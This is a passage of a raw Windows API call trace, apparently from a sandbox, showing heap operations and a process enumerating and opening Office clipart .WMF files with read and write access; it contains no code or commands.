Flags=0x0, Size=0x20) returned 0x883b0 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.691] AreFileApisANSI () returned 1 [0101.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 69 [0101.691] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c)) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0101.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.691] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04267_.WMF", cAlternateFileName="")) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.692] AreFileApisANSI () returned 1 [0101.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.692] AreFileApisANSI () returned 1 [0101.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 69 [0101.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.734] GetFileType (hFile=0x33c) returned 0x1 [0101.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.734] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.734] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.735] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.735] CloseHandle (hObject=0x33c) returned 1 [0101.735] AreFileApisANSI () returned 1 [0101.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 69 [0101.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.735] GetFileType (hFile=0x33c) returned 0x1 [0101.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.735] CloseHandle (hObject=0x33c) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.737] AreFileApisANSI () returned 1 [0101.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0101.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 69 [0101.737] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc89dc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc89dc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c)) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04269_.WMF", cAlternateFileName="")) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0101.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.739] AreFileApisANSI () returned 1 [0101.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0101.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.740] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.740] AreFileApisANSI () returned 1 [0101.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.740] MultiByteToWideChar (in: CodePage=0x0, 